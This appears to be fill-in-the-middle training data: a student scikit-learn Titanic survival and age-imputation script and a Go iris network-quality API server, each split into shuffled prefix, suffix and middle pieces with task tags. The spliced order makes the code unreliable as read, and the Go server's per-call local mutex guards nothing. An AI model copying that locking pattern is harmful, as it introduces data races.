all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
| RFBestDepth():
| identifier_name |
titanic5.py | #
# read Titanic data
#
import numpy as np
from sklearn import cross_validation
from sklearn import tree
from sklearn import ensemble
import pandas as pd
print("+++ Start of pandas' datahandling +++\n")
# df here is a "dataframe":
df = pd.read_csv('titanic5.csv', header=0) # read the file w/header row #0
# drop columns here
df = df.drop(['name', 'ticket', 'fare', 'cabin', 'home.dest','embarked'], axis=1)
# One important one is the conversion from string to numeric datatypes!
# You need to define a function, to help out...
def tr_mf(s):
""" from string to number
"""
d = { 'male':0, 'female':1 }
return d[s]
df['sex'] = df['sex'].map(tr_mf) # apply the function to the column
df.head() # first five lines
df.info() # column details
#
# end of conversion to numeric data...
print("\n+++ End of pandas +++\n")
print("+++ Start of numpy/scikit-learn +++\n")
# Save the rows with age unknown before we drop them
all_data = df.values
# drop the unknown rows now
df = df.dropna()
# Data needs to be in numpy arrays - these next two lines convert to numpy arrays
X_data_full = df.drop('survived', axis=1).values
y_data_full = df[ 'survived' ].values
# The first twenty are our test set - the rest are our training
X_test = X_data_full[0:20,:] # the final testing data
X_train = X_data_full[20:,:] # the training data
y_test = y_data_full[0:20] # the final testing outputs/labels (unknown)
y_train = y_data_full[20:] # the training outputs/labels (known)
feature_names = df.drop('survived', axis=1).columns.values
target_names = ['0','1']
##########################################################
## ##
## Preliminary Work to determine max_depth value ##
## ##
##########################################################
# 10-fold cross-validate (use part of the training data for training - and part for testing)
# first, create cross-validation data (here 9/10 train and 1/10 test)
# Iterates through the n_neighbors model parameter, also called k, in order
# to determine which one performs best by 10-fold cross-validate.
def findBestScore():
""" FindBestScore iterates through the n_neighbors model parameter,
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding k value.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
dtree = dtree.fit(cv_data_train, cv_target_train)
dtree.feature_importances_
trainng_score += [dtree.score(cv_data_train,cv_target_train)]
testing_score += [dtree.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# Run multiple trials and determine k value
# for i in range(20):
# print (findBestScore())
"""
Comments and results:
Briefly mention how this went:
+ what value of max_depth did you decide on for your decition tree?
By runnint findBestScore() 20 times, I found the highest scores mostly
happen when max_depth is 3.
+ The average cross-validated test-set accuracy for your best DT model:
(0.83900000000000008,3)
+ A brief summary of what the first two layers of the DT "ask" about a
line of data:
First layer: sex; second layer: pclass and age
"""
######################################
## ##
## Model Decision Tree Graph ##
## ##
######################################
def decisionTreeGraph(max_depth):
""" generate dot file for MDT graph """
dtree = tree.DecisionTreeClassifier(max_depth=max_depth)
# this next line is where the full training data is used for the model
dtree = dtree.fit(X_data_full, y_data_full)
print("\nCreated and trained a decision tree classifier")
#
# write out the dtree to tree.dot (or another filename of your choosing...)
tree.export_graphviz(dtree, out_file='tree' + str(max_depth) + '.dot', # constructed filename!
feature_names=feature_names, filled=True, rotate=False, # LR vs UD
class_names=target_names, leaves_parallel=True)
print ('write out tree.dot')
# the website to visualize the resulting graph (the tree) is at www.webgraphviz.com
# print (decisionTreeGraph(3))
##########################################################
## ##
## Find max_depth and n_estimators for RF model ##
## ##
##########################################################
#
# The data is already in good shape -- a couple of things to define again...
#
def findRFBestDepth():
""" | Run multiple trials and determine max_depth value
# for i in range(20):
# print (findRFBestDepth())
def findRFBestN():
""" findRFBestN iterates through the model parameter, n_estimators
between 1 and 200 that is the mutiple of 10 to determine which one
performs best by returning the maximum testing_avgScore and the
corresponding max_depth value when max_depth is 16.
"""
resultList = []
BestScore = 0
nList = [ n for n in range(1,200) if n%10 == 0]
for n in nList:
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=n)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_n = n
resultList += [[n, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding n_estimator is: ')
return BestScore, best_n
# Run multiple trials and determine n value
# for i in range(20):
# print (findRFBestN())
# RF model feture importances
rforest = ensemble.RandomForestClassifier(max_depth=5, n_estimators=110)
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1) # random_state=0
# fit the model using the cross-validation data
rforest = rforest.fit(X_train, y_train)
# print("feature importances from RF model are:", rforest.feature_importances_)
"""
what value of max_depth did you decide on for your decition tree?
By running findRFBestDepth() 20 times, I found the highest scores mostly
happen when max_depth is 5 and n_estimator is 110.
The average cross-validated test-set accuracy for your best RF model:
0.83600000000000008
Feature importances:
[ 0.20447085 0.532224 0.14179381 0.0545039 0.06700745]
"""
#####################################
## ##
## Impute the missing ages ##
## ##
#####################################
# Imputing
from impute import ImputeLearn
from sklearn import neighbors
#
# impute with RFs
#
all_data_imp = ImputeLearn( all_data ).impute(learner = ensemble.RandomForestRegressor(n_estimators = 110,max_depth=5))
# print("RF imputed outputs are")
# print(all_data_imp[:30,3])
"""
RF imputed outputs are
[ 28.61872875 28.63456658 28.65385468 28.7512153 28.51688421
28.61481153 26.55535028 28.67823843 28.67123124 28.60948563
33.99177592 34.14306998 30.3744952 33.17889396 30.29148392
29.89082837 30.08769026 34.28713337 29.22173117 14.03788659
36.51798391 17.54575112 44.39754546 43.0770746 42.30811932
38.29996219 38.00541655 43.07320461 51.04449032 43.05613767]
Compared to the google sheet, we could see that the imputed outputs are not
accurate at all.
"""
# Extra credit: compute using KN
all_data_imp1 = ImputeLearn( all_data ).impute(learner = neighbors.KNeighborsRegressor(n_neighbors=5))
print("KN imputed outputs are")
print(all_data_imp1[:30,3])
"""
KN imputed outputs are
[ 25.2 25.2 25.2 25.2 25.2 25.2 24.2 25.2
25.2 25.2 34.3 34.3 31.6 30.8 31.6 31.6
31.6 34.3 28. 3.36666 32.4 41. 36.8 43.6
36.8 46.2 53. 36.1 51.4 36.1 ]
Compared to RF algorithm, KN is slightly more accurate.
"""
| findRFBestDepth iterates through the model parameter, max_depth
between 1 and 20 to determine which one performs best by returning
the maximum testing_avgScore and the corresponding max_depth value
when n_estimators is 100.
"""
resultList = []
BestScore = 0
# iterate through different max_depths from 1 to 19
for max_depth in range(1,20):
rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)
trainng_score = []
testing_score = []
# run 10 different cross-validation
for index in range(10):
# split into cross-validation sets.
cv_data_train, cv_data_test, cv_target_train, cv_target_test = \
cross_validation.train_test_split(X_train, y_train, test_size=0.1)
# fit the model using the cross-validation data
# and tune parameter, such as max_depth here
rforest = rforest.fit(cv_data_train, cv_target_train)
trainng_score += [rforest.score(cv_data_train,cv_target_train)]
testing_score += [rforest.score(cv_data_test,cv_target_test)]
# Compute the average score for both traning and testing data
trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)
testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)
# find the best score
if testing_avgScore > BestScore:
BestScore = testing_avgScore
best_depth = max_depth
resultList += [[best_depth, trainng_avgScore, testing_avgScore]]
print ('The best average score and the corresponding max_depth is: ')
return BestScore, best_depth
# | identifier_body |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*InternetNetQuality `json:"data"`
}
type HostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime | Time = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询质量探测的目标IP地址和对应的丢包率,只查询最近半分钟的
*/
func (a *APIServer) queryQualityDataByHostHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//只取t.EndTime最近的30s内的数据,如果t.EndTime=0,则查询最新的数据
if t.EndTime <= 0 {
endTime = time.Now()
} else {
endTime = time.Unix(t.EndTime, 0)
}
startTime = endTime.Add(-30 * time.Second)
data, err := queryHostQualityData(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &HostQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &HostQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
func (a *APIServer) queryData() {
t := time.Now()
data, err := queryNetQualityData(t, a.config.DataSourceUrl)
//data, err := queryNetQualityDataMock("./mock_data.json")
var respBody *NetQualityDataResponse
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody = &NetQualityDataResponse{500, errMsg, nil}
} else {
respBody = &NetQualityDataResponse{200, "", data}
}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
l := sync.Mutex{}
l.Lock()
a.qualityDataCache = d
a.qualityDataRaw = data
l.Unlock()
}
/*
周期性查询全量监控数据,然后分析告警。这里相当于把api接口和告警分析结合了起来
主要是避免数据多次查询,也是为了报警和和前端查询的结果一致。
*/
func (a *APIServer) retrieveQualityDataAndAnalysisAuto(config *Configuration) {
// init interval ticker
ticker := time.NewTicker(a.queryInterval)
defer ticker.Stop()
//初始化一个分析器
analyzer := NewNetQualityAnalyzer(config.AnalysisConfig, config.AlarmConfig)
analyzer.alarm()
for {
//读取时间
<-ticker.C
go func() {
a.queryData()
analyzer.computePacketLossThreshold(a.qualityDataRaw)
analyzer.eventCheck()
}()
//Check signal channel
select {
case <-a.stopSignal:
a.log.Info("Retrieve will to stop for received interrupt signal.")
return
default:
continue
}
}
}
func (a *APIServer) Stop() {
go func() {
ch := make(chan os.Signal, 1)
signal.Notify(ch,
// kill -SIGINT XXXX 或 Ctrl+c
os.Interrupt,
syscall.SIGINT, // register that too, it should be ok
// os.Kill等同于syscall.Kill
os.Kill,
syscall.SIGKILL, // register that too, it should be ok
// kill -SIGTERM XXXX
syscall.SIGTERM,
)
select {
case <-ch:
a.stopSignal <- struct{}{}
log.Info("Server is shutdown...")
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
_ = a.i.Shutdown(ctx)
}
}()
}
var excludeExtensions = [...]string{
".js",
".css",
".jpg",
".png",
".ico",
".svg",
}
func newRequestLogger(logfile string) (h iris.Handler, close func() error) {
close = func() error { return nil }
c := iris_logger.Config{
Status: true,
IP: true,
Method: true,
Path: true,
Columns: false,
}
logFile, err := openLogFile(logfile)
if err != nil {
panic(err)
}
close = func() error {
return logFile.Close()
}
c.LogFunc = func(now time.Time, latency time.Duration, status, ip, method, path string, message interface{}, headerMessage interface{}) {
output := fmt.Sprintf("%s %s %s %s %s\n", now.Format("2006/01/02 - 15:04:05"), status, ip, method, path)
_, _ = logFile.Write([]byte(output))
}
c.AddSkipper(func(ctx iris.Context) bool {
path := ctx.Path()
for _, ext := range excludeExtensions {
if strings.HasSuffix(path, ext) {
return true
}
}
return false
})
h = iris_logger.New(c)
return
}
| <= 0 || t.EndTime <= 0 {
end | identifier_name |
apiserver.go | package nqas
import (
native_context "context"
"encoding/json"
"fmt"
"github.com/kataras/iris/v12"
iris_logger "github.com/kataras/iris/v12/middleware/logger"
iris_recover "github.com/kataras/iris/v12/middleware/recover"
"local.lc/log"
"net"
"os"
"os/signal"
"runtime/debug"
"strings"
"sync"
"syscall"
"time"
)
type APIServer struct {
//
listener net.Listener
//iris Http Server
i *iris.Application
//配置内容
config APIServerSetting
//记录程序日志,不同于http请求的日志
log *log.Logger
//缓存数据,是经过json序列化过的
qualityDataCache []byte
//原始数据,没有见过序列化
qualityDataRaw []*InternetNetQuality
//缓存时间, 转换成时间戳,方便后续处理
cacheTime int
//查询时间间隔
queryInterval time.Duration
//停止信号
stopSignal chan struct{}
}
func NewAPIServer(config APIServerSetting) (*APIServer, error) {
var err error
api := new(APIServer)
api.config = config
//默认值,需要修改的话从外部修改
api.queryInterval = time.Duration(30 * time.Second)
api.i = iris.New()
iris.RegisterOnInterrupt(func() {
timeout := 5 * time.Second
ctx, cancel := native_context.WithTimeout(native_context.Background(), timeout)
defer cancel()
// close all hosts
_ = api.i.Shutdown(ctx)
})
cfg := iris.Configuration{}
cfg.DisableBodyConsumptionOnUnmarshal = true
cfg.DisableStartupLog = true
api.i.Configure(iris.WithConfiguration(cfg))
addr := fmt.Sprintf("%s:%s", api.config.Host, api.config.Port)
log.Infof("Listening on %s", addr)
api.listener, err = net.Listen("tcp4", addr)
if err != nil {
log.Error(err)
return nil, err
}
api.i.Use(iris_recover.New())
//api.i.Use(iris_logger.New())
api.i.RegisterView(iris.HTML("./html", ".html"))
return api, nil
}
func (a *APIServer) Run() {
a.Stop()
//设置APIServer自身日志
l, err, closeLogFile := initLogger(a.config.LogFile, "")
if err != nil {
panic(err)
}
defer closeLogFile()
a.log = l
defer func() {
err := recover()
if err != nil {
a.log.Error("API server running error.")
a.log.Errorf("API Server running error: %v", err)
a.log.Errorf("API server running stack info: %s", string(debug.Stack()))
os.Exit(2)
}
}()
//初始化日志记录,只能在此处初始化,否则defer close()将要在函数返回后执行,导致日志文件被关闭
r, _close := newRequestLogger(a.config.AccessLogFile)
defer _close()
a.i.Use(r)
a.log.Info("API Server is starting...")
a.startAPI()
}
func (a *APIServer) startAPI() {
a.registerRoute()
err := a.i.Build()
if err != nil {
a.log.Error(err)
return
}
err = iris.Listener(a.listener)(a.i)
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) registerRoute() {
//Static files
a.i.HandleDir("/css", "./html/css")
a.i.HandleDir("/fonts", "./html/fonts")
a.i.HandleDir("/js", "./html/js")
//Favicon
a.i.Favicon("./html/favicon.ico")
//RootPage
a.i.Get("/", a.rootPageHandler)
//Views
a.i.Get("/netqualitydetail", a.detailPageHandler)
a.i.Get("/netqualitysummary", a.summaryPageHandler)
apiRoutes := a.i.Party("/api")
apiRoutes.Post("/netquality", a.queryQualityDataTotalHandler)
apiRoutes.Post("/netqualitydetail", a.queryQualityDataDetailHandler)
apiRoutes.Post("/netqualitysummary", a.queryQualityDataSummaryHandler)
apiRoutes.Post("/hostquality", a.queryQualityDataByHostHandler)
}
func (a *APIServer) rootPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("index.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) detailPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("detail.html")
if err != nil {
a.log.Error(err)
}
}
func (a *APIServer) summaryPageHandler(ctx iris.Context) {
//err := ctx.ServeFile("index.html", false)
err := ctx.View("summary.html")
if err != nil {
a.log.Error(err)
}
}
type TimeStampFilterPayload struct {
TimeStamp int64 `json:"timestamp"`
}
type NetQualityDataResponse struct {
Code int | ostQualityDataResponse struct {
Code int `json:"code"`
Message string `json:"message"`
Data []*HostQuality `json:"data"`
}
/*
查询最近时刻时刻或者指定时刻的全量数据
*/
func (a *APIServer) queryQualityDataTotalHandler(ctx iris.Context) {
var t TimeStampFilterPayload
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
if t.TimeStamp <= 0 {
_, _ = ctx.Write(a.qualityDataCache)
} else {
data, err := queryNetQualityData(time.Unix(t.TimeStamp, 0), a.config.DataSourceUrl)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
}
type QueryDetailDataFilter struct {
StartTime int64 `json:"starttime"`
EndTime int64 `json:"endtime"`
SrcNetType string `json:"srcnettype"`
DstNetType string `json:"dstnettype"`
SrcLocation string `json:"srclocation"`
DstLocation string `json:"dstlocation"`
}
/*
查询给定条件下,一段时间内的详细数据
*/
func (a *APIServer) queryQualityDataDetailHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
//TODO:可能有bug
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataByTarget(
startTime,
endTime,
t.SrcNetType,
t.DstNetType,
t.SrcLocation,
t.DstLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
}
/*
查询给定条件下,查询一段时间的汇总数据
*/
func (a *APIServer) queryQualityDataSummaryHandler(ctx iris.Context) {
var t QueryDetailDataFilter
if err := ctx.ReadJSON(&t); err != nil {
respBody := &NetQualityDataResponse{500, "Query parameters is parsed failed!", nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
var startTime time.Time
var endTime time.Time
//时间为0的时候,查询最新的数据。相当于客户端侧增量拉取数据
if t.StartTime <= 0 || t.EndTime <= 0 {
endTime = time.Now()
startTime = endTime.Add(-30 * time.Second)
} else {
endTime = time.Unix(t.EndTime, 0)
startTime = time.Unix(t.StartTime, 0)
}
//最大查询时间不超过1天,如果开始时间和结束事件相同,查询最近30s内的数据
if endTime.Sub(startTime) > 24*time.Hour {
endTime = startTime.Add(24 * time.Hour)
}
data, err := queryNetQualityDataBySource(
startTime,
endTime,
t.SrcNetType,
t.SrcLocation,
a.config.DataSourceUrl,
)
if err != nil {
errMsg := fmt.Sprintf("Retrieved quality data failed. error : %v", err)
respBody := &NetQualityDataResponse{500, errMsg, nil}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
return
}
respBody := &NetQualityDataResponse{200, "", data}
d, err := json.Marshal(respBody)
if err != nil {
a.log.Error(err)
}
//ctx.Write(d)
_, _ = ctx.GzipResponseWriter().Write(d)
